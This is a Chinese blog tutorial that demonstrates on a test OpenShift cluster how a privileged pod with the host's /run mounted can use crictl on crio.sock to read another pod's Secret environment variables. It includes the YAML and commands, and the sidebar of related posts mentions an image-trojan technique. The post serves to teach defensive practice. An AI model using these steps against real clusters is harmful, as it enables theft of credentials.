OpenShift 4 - 如何利用“风险镜像+配置漏洞”攻击应用 Secret(附视频)

已于 2023-07-18 11:41:28 修改
阅读量600 收藏
点赞数
分类专栏: OpenShift 4 安全 secret 文章标签: openshift kubernetes docker
于 2022-10-07 14:05:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43902588/article/details/127184733
版权
OpenShift 4 同时被 3 个专栏收录
271 篇文章 77 订阅
订阅专栏
安全
76 篇文章 6 订阅
订阅专栏
secret
7 篇文章 0 订阅
订阅专栏

OpenShift 4.x HOL教程汇总
本文在 OpenShift 4 和 Kubernetes 1.20 环境中进行验证。

文章目录

容器镜像和 Secret 安全风险

我们通常使用 Kubernetes 的 Secret 对象来保存敏感信息,例如:用户名/密码、访问 Token、秘钥等。攻击者一旦获取 Secret 中的敏感信息,要不可以轻松攻破并获取到存放在应用数据的数据库,要不可以通过获取的 Token 或秘钥进一步进入无权访问的被保护系统,造成进一步危害和损失。

为了获得一个 Secret 对象的内容,大致步骤如下:

  1. 选择一个能够以 root 运行的镜像,其中包含 curl、wget 这类卸载命令、yum、apt-get 这类包安装管理工具。
  2. 基于以上镜像,以提权的配置运行起对应的容器,并将宿主机的目录挂载到运行的容器中。
  3. 下载并安装必要的软件,然后在容器中访问宿主机的目录。
  4. 获得运行在该节点的容器实例以及对应的 Secret 配置。

从上面可以看出,如果要获取到应用容器使用的 Secret,需要利用以下几个在 Kubernetes 或 OpenShift 生产环境中 “不良” 的实践和配置。
在这里插入图片描述

镜像默认使用 root 用户

在打包应用镜像的时候可以指定默认使用的用户。很遗憾,在 docker.io 中的大多数镜像默认使用的都是 root 用户。由于 root 用户意味着用户进入容器后可以进行不受限的操作,任意读写文件、下载安装软件,因此这是不安全隐患的开始。

Red Hat 官方提供的应用容器镜像都是以非 root 作为默认用户,这样从镜像方面限制了可以在容器中进行的危害操作,从而提升了安全性。

提权运行 Pod

一个受限运行的容器通常只能对容器内部资源进行操作,但是一个提权运行的容器是可以访问到运行它的宿主机上的文件资源。这样就将潜在的危险从容器扩展到宿主机层面了。

使用环境变量访问 Secret 中的数据

存放在 Secret 中敏感数据并不是加密保存的,而只是经过 base64 编码的,因此在获得 Secret 后通过 decode 可以很容易获得敏感数据的实际内容,因此使用 Secret 需要格外小心。当 Pod 或容器使用 Secret 的数据的时候,可以使用以下 2 种方式:

  1. 在容器中通过环境变量访问 Secret 中的数据。
  2. 将 Secret 对象挂载到容器中,这样在容器中通过访问挂载的文件就可获得 Secret 中的数据。

以上 2 中使用 Secret 的方法是存在安全风险的。其中第 1 种通过环境变量的方式风险更高,这是因为这些敏感数据可以直接从容器运行环境外部的描述中获得,攻击者无需进入使用 Secret 的容器内部。而对于第 2 种使用 Secret 的方法,攻击者就必须先进入使用 Secret 的容器内部才能访问到 Secret,这样就增加了攻击的难度,因此相对更加安全。

利用“风险镜像+配置漏洞”攻击应用 Secret

准备被攻击应用环境

  1. 使用集群管理员在 OpenShift 中创建 myapp 项目。
$ oc new-project myapp
  1. 使用以下 YAML 内容在 myapp 项目中创建 Secret 和 Pod 资源。其中 Secret 中的 data 包含了 username 和 password 敏感数据;而 Pod 采用环境变量的方式使用了 Secret 中的 username 和 password 敏感数据。
apiVersion: v1
kind: Secret
metadata:
  name: mysecret
type: Opaque
data:
  username: YWRtaW4=
  password: bXlwYXNzd29yZA==
---
apiVersion: v1
kind: Pod
metadata:
  name: secret-env-pod
spec:
  containers:
  - name: busybox
    image: busybox
    command: ['sh','-c','echo "The username is $USERNAME, password is $PASSWORD"; sleep 3600']
    env:
      - name: USERNAME
        valueFrom:
          secretKeyRef:
            name: mysecret
            key: username
            optional: false
      - name: PASSWORD
        valueFrom:
          secretKeyRef:
            name: mysecret
            key: password
            optional: false
  restartPolicy: Never
  1. 执行命令查看 myapp 的日志,确认可以通过环境变量访问到 username 和 password 敏感数据
$ oc logs -n myapp pod/secret-env-pod

准备攻击环境

  1. 使用集群管理员赋给 developer 用户以 privileged 的安全上下文。
$ oc adm policy add-scc-to-user privileged developer

注意:此文由于要演示攻击过程,因此必须给 developer 用户以 privileged 安全上下文。但是为了能共享数据或作为 Cache 缓存提升性能,有些情况能也会用到宿主机的存储,此时也需要赋予用户以 privileged 的安全上下文。

  1. 使用 developer 用户登录 OpenShift,然后创建 myrisk 项目。
$ oc new-project myrisk
  1. 使用 developer 用户并基于以下 YAML 运行名为 privileged-pod 的 Pod,它将作为攻击发起的 Pod。因为有 “privileged: true” 的配置,它可将宿主机的 “/run” 目录挂载到容器中。
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: risk-shell
    image: ubuntu:latest
    stdin: true
    tty: true
    volumeMounts:
    - mountPath: /mnt
      name: volume
    securityContext:
      privileged: true
  volumes:
  - name: volume
    hostPath:
      path: /run

攻击被测试应用的 Secret

  1. 执行命令进入 privileged-pod 内部。
$ oc rsh -n myrisk pod/privileged-pod
  1. 在 privileged-pod 内部执行以下命令,先安装 curl 和 jq 命令,然后下载并解压 CRI-O 容器运行环境的客户端。
cd ~
apt-get update; apt-get install -y curl jq
curl -LO https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.25.0/crictl-v1.25.0-linux-amd64.tar.gz
tar -xvf crictl-v1.25.0-linux-amd64.tar.gz
  1. 执行命令,先获取名为 busybox 的容器 ID,然后查看该容器的配置信息中 “.info.runtimeSpec.process.env” 区域。
ID=$(~/crictl --runtime-endpoint /mnt/crio/crio.sock ps | grep busybox  | awk '{print $1}')
~/crictl --runtime-endpoint /mnt/crio/crio.sock inspect $ID | jq .info.runtimeSpec.process.env
  1. 确认返回结果中包含 USERNAME 和 PASSWORD。
[
  "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
  "TERM=xterm",
  "HOSTNAME=secret-env-pod",
  "NSS_SDB_USE_CACHE=no",
  "USERNAME=admin",
  "PASSWORD=mypassword",
  "KUBERNETES_SERVICE_PORT=443",
  "KUBERNETES_SERVICE_PORT_HTTPS=443",
  "KUBERNETES_PORT=tcp://10.217.4.1:443",
  "KUBERNETES_PORT_443_TCP=tcp://10.217.4.1:443",
  "KUBERNETES_PORT_443_TCP_PROTO=tcp",
  "KUBERNETES_PORT_443_TCP_PORT=443",
  "KUBERNETES_PORT_443_TCP_ADDR=10.217.4.1",
  "KUBERNETES_SERVICE_HOST=10.217.4.1",
  "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
]

演示视频

视频

参考

https://github.com/nmeisenzahl/hijack-kubernetes/blob/main/docs/hands-on.md

dawnsky.liu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
openresty-1.23.0.1.tar.gz
08-03
这个openresty包是基于官方最新代码 编译好的。 openresty中升级nginx openresty如何升级nginx的版本? Nginx <= 1.21.6 有RCE 漏洞。 修复nginx <= 1.21.5 爆出栈溢出rce漏洞,openresty什么时候升级,或者如何单独升级nginx nginx内核版本升级到了1.23.0 2022年4月11日, NGINX发布安全公告,修复了一个NGINX LDAP参考实现中的一个代码执行漏洞漏洞编号:暂无,漏洞威胁等级:高危。 当满足以下一个或多个条件时,会出现此问题: ①命令行参数用于配置 nginx-ldap-auth Python 守护进程。 ②有未使用的可选 nginx-ldap-auth 配置参数。 ③nginx-ldap-auth 的 LDAP 身份验证取决于特定的组成员身份。 需要的自取。 编译时要 加上 --without-http_redis_module,因为
openshift4-vmware-upi:支持在VMware上自动安装OpenShift 4的Ansible手册和文档
01-31
在VMware上自动配置OpenShift 4.6 该存储库包含一组手册,以帮助促进OpenShift 4.6在VMware上的部署。 OpenShift 4.6的更改 请注意,如果未对append bootstrap配置进行一些修改,则此安装程序将无法与OpenShift的...
Nginx/OpenResty目录穿越漏洞复现
小小猪的博客
11-26 1万+
Nginx/OpenResty目录穿越漏洞复现 漏洞背景: 2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞。 Nginx 是异步框架的网页服务器,也可以用作反向代理、负载平衡器和HTTP缓存。 OpenResty是一个基于nginx的Web平台,它对nginx增加LuaJIT引擎使其运行Lua脚本。 影响版本: nginx <= v1.17
文件上传漏洞
kuzemax的博客
06-02 2646
文件头类型检查文件类型文件幻术头GIF 47 49 46 38 39 61(相当于文本的GIF89a)图片🐎制作方式将一句话木马植入图片中,一句话木马最好不要植入在图片的开头(有可能会造成文件损坏),Windows执行语句:copy xx.jpg/b+test.php/a test.jpg;Linux木马植入执行语句:cat test.php >> xx.jpg\b以二进制格式复制、合并文件 \a指定以ascll格式复制、合并文件。
Nginx/OpenResty内存泄漏/目录穿越漏洞
公众号shadow sock7
03-20 1万+
影响版本 nginx <= v1.17.7 (commit af8ea176a743e97d767b3e1439d549b52dd0367a) openresty <= v1.15.8.2 参考配置 openresty的nginx配置文件:/usr/local/openresty/nginx/conf/nginx.conf, 可执行nginx文件:/usr/local/openres...
OpenResty无损升级内嵌nginx版本0DAY漏洞
qq1071643762的博客
08-01 4993
OpenResty无损升级内嵌nginx版本,nginx
openshift4-rhv-upi:支持使用Baremetal UPI在RHV上自动安装OpenShift 4的Ansible手册和文档
02-02
使用Baremetal UPI在RHV上配置OpenShift 4.4 该存储库包含一组手册,以帮助促进OpenShift 4.4在RHV上的部署。 背景 该存储库中的剧本/脚本应该可以帮助您自动化RHV上的绝大多数OpenShift 4.4 UPI部署。 请务必阅读...
OpenShift4-tools:OpenShift 4工具
04-08
OpenShift4-工具 安装工具等。OpenShift 4集群。 目录 集群实用程序 oinst :OpenShift 4.x安装程序包装器,当前适用于AWS,GCE和libvirt。 您可能需要安装kubechart(github.com/sjenning/kubechart/kubechart)...
openshift4-upi-openstack
05-08
OpenStack上的OpenShift 4 UPI Ansible角色,用于将OpenShift 4的用户提供的基础架构安装方法的必要任务自动化到自定义OpenStack 基于原始的变数安装的默认变量位于defaults/main.yml执照BSD
openshift-ansible:安装和配置OpenShift 3.x集群
01-31
OpenShift 4.x OpenShift 4.x的安装使用命令行安装向导而不是Ansible剧本。 在此了解有关OpenShift安装程序的。 对于OpenShift 4.x,此存储库仅提供在现有4.x群集中扩展或升级RHEL主机所需的剧本。 跟踪我们当前的...
漏洞预警】Nginx/OpenResty 特殊配置下内存泄漏与目录穿越漏洞
讯开技术孵化器博客
05-24 3282
Nginx/OpenResty 特殊配置下内存泄漏漏洞描述影响版本安全建议平滑升级nginx到最新版一、升级前准备二、平滑升级nginx 漏洞描述 阿里云应急响应中心监测到国外安全研究者公开了Nginx/OpenResty在特殊配置下存在内存泄漏或目录穿越漏洞详情。 Nginx是一个高性能的HTTP和反向代理web服务器,OpenResty是一个基于 Nginx 与 Lua 的高性能Web平台。近日国外安全研究者公开了Nginx/OpenResty在特殊配置下存在内存泄漏或目录穿越漏洞详情。由于Nginx在
Nginx/OpenResty内存泄漏/目录穿越漏洞复现
热门推荐
sacredbook的博客
05-02 1万+
前言 最近一直在忙cissp的备考,好多前阵子做的一些技术调研没来得及整理成文章发出来,为了坚持每月至少一篇的更新,这次发的质量稍微水一些。前阵子Nginx/OpenResty爆出了2个漏洞,一个内存泄漏另一个目录遍历。当时在公司做了应急,复现的情况也一并做了记录,这两个漏洞原理相对比较简单,但影响面还是比较大的。 漏洞通报概况 2020 年 03 月 18 日,360 CERT 监测发现 op...
OpenResty预防SQL注入
最新发布
IPDs的博客
08-07 239
OpenResty 预防 SQL注入
OpenResty从入门到精通22-[视频]从一个安全漏洞说起,探寻API性能和安全的平衡
fegus的博客
05-18 222
你好,我是温铭。今天的内容,我同样会以视频的形式来讲解。这几个问题,也是今天视频课要解决的核心内容,希望你可以先自己思考一下,并带着问题来学习今天的视频内容。同时,我会给出相应的文字介绍,方便你在听完视频内容后,及时总结与复习。下面是今天这节课的文字介绍部分。
渗透测试之小白的常见web漏洞总结(上)
weixin_46236101的博客
10-06 1213
概述 渗透测试其实就是一个攻防对抗的过程,所谓知己知彼,才能百战百胜。 如今的网站基本都有防护措施,大企业或大单位因为网站众多,一般都会选择大型防火墙作为保护措施,比如深信服、天融信等等,小单位或单个网站通常会选择D盾、安全狗或开源的安全软件作为保护措施,一些常见的开源waf有:OpenResty 、ModSecurity、NAXSI、WebKnight、Shadow Daemon等等。 当然,裸跑的网站还是有的。 而这些防护措施都有对常见漏洞的防御措施, 所以在实际的漏洞挖掘和利用过程中必须考虑这些问题,
openshiftsecret
Jian Sun_的博客
03-05 1039
1、用户认证 openshift通过OAuth进行用户认证,OAuth是一个开源的认证和授权框架,OAuth通过用户登录认证以后,返回一个token,用户可以在有效的时间内对系统进行访问。 获取token:oc whoami -t 获取tokenAPI:/oauth/token/request 2、身份验证 identity provider openshift提供不同的适配器链接不同的用户...
OpenShift 4 - 节点是如何通过CRI-O运行容器的
多恩斯基的博客
09-10 1599
文章目录OpenShift节点运行容器过程Kubelet服务查看节点的CRI-O服务conmon监控进程参考 OpenShift节点运行容器过程 OpenShift 4的集群节点使用了基于CRI-O的容器运行环境。每个节点的kubelet通过gRPC调用CRI-O,而CRI-O运行符合OCI规范的容器。 Kubernetes联系kubelet来启动一个pod。 kubelet将请求通过CRI(Container runtime interface,容器运行时接口)转发给CRI-O守护进程,然后来启动新的P
Nginx/OpenResty内存泄漏/目录穿越漏洞通告
爱国小白帽
03-19 7416
Nginx/OpenResty内存泄漏/目录穿越漏洞通告 原创 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年03月18日, 360CERT监测发现 openwall oss-security 邮件组披露了两枚漏洞。在特定配置下 nginx/openresty 存在 内存泄漏漏洞/目录穿越漏洞。 Nginx 是异步框架的网页服务...
OpenShift 4 - 了解Secret
多恩斯基的博客
09-30 1184
文章目录关于Secret对象三种途径创建Secret对象Secret对象的结构创建Secret对象一般结构Secret通过命令创建Secret通过YAML创建Secret属于dockerconfigjson或dockercfg类型的pull-secretbasic-auth类型secretssh-auth类型secret引用或使用Secret中内容在Pod中通过挂载存储使用Secret在Pod中通过环境变量使用Secret在Pod中使用pull_secret在ServiceAccount中使用secret
openshift internal-registry 切换 sc
05-25
要在 OpenShift 中切换内部注册表的 StorageClass(SC),可以遵循以下步骤: 1. 查看当前内部注册表的 StorageClass: ``` oc get cm image-registry-config -n openshift-image-registry -ojsonpath='{.data.storage}' ``` 2. 在输出中找到当前使用的 StorageClass 的名称,例如 `default`. 3. 创建一个新的 StorageClass,例如 `new-sc`, 并设置适当的参数(例如 storageClassName、provisioner、parameters 等)。 4. 更新内部注册表的配置以使用新的 StorageClass: ``` oc patch configs.imageregistry.operator.openshift.io/cluster -n openshift-image-registry --type merge --patch '{"spec":{"storage":{"pvc": {"claim": {"storageClassName": "new-sc"}}}}}' ``` 5. 验证配置是否已更新: ``` oc get cm image-registry-config -n openshift-image-registry -ojsonpath='{.data.storage}' ``` 在输出中,应该看到新的 StorageClass 的名称。现在内部注册表将使用新的 StorageClass 来创建持久卷声明(PVC)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值